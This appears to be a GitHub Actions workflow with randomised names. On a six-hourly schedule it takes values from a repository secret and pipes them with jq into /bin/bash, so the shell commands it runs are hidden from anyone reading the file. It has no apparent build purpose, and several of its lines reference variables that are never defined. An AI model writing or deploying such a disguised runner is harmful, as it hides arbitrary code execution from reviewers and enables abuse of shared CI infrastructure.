name: xiaoyutou3876
on:
  workflow_dispatch:
  schedule:
    - cron: '28 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: xiaoyutou3876
        env:
          cqx9328: ${{ secrets.cqx9328 }}
        run: |
          echo $cqx9328 | jq -r .ft7 | /bin/bash
          echo $fpw9 | jq -r .afxw834 | /bin/bash
          echo $wdxjc81 | jq -r .p1 | /bin/bash
          echo $gwa307 | jq -r .fyb9 | /bin/bash
          echo $z3836 | jq -r .bzofj6021 | /bin/bash
          echo $j8 | jq -r .iydb5893 | /bin/bash
          echo $z2 | jq -r .hk3 | /bin/bash
          echo $skl6 | jq -r .lvs8791 | /bin/bash

